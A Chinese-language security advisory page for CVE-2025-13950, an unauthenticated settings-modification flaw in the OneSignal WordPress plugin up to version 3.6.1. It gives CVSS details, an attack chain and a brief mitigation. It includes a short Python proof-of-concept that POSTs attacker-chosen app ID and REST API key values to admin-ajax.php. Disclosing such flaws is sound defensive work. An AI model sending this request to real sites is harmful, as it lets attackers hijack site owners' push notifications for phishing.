CVE-2025-13950 CVSS 5.3 中危

CVE-2025-13950 OneSignal WordPress插件未授权配置修改漏洞

披露日期: 2025-12-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13950

漏洞类型

未授权访问/权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OneSignal WordPress Plugin

漏洞概述

OneSignal WordPress推送通知插件存在严重的安全漏洞，攻击者可未经身份验证直接通过POST请求修改插件配置。漏洞源于插件未正确验证用户权限和nonce令牌，导致Settings处理功能缺乏必要的访问控制。

技术细节

The vulnerability stems from insufficient validation of user permissions and nonce tokens during POST request handling. This allows unauthenticated attackers to modify critical plugin settings through direct requests.

攻击链分析

STEP 1

Reconnaissance

Attacker identifies WordPress site running vulnerable OneSignal plugin version <= 3.6.1

STEP 2

Exploitation

Attacker sends crafted POST request to admin-ajax.php without authentication

STEP 3

Configuration Modification

Malicious App ID and REST API key are stored in plugin settings

STEP 4

Impact

Push notifications can be hijacked, redirected, or used for phishing attacks

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

url = 'http://target-wordpress-site/wp-admin/admin-ajax.php'
data = {
    'action': 'onesignal_settings',
    'onesignal_app_id': 'malicious_app_id',
    'onesignal_rest_api_key': 'malicious_api_key'
}

response = requests.post(url, data=data)
print(response.text)

影响范围

OneSignal WordPress Plugin <= 3.6.1

防御指南

临时缓解措施

Temporarily disable OneSignal plugin or implement firewall rules to restrict admin-ajax.php access

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表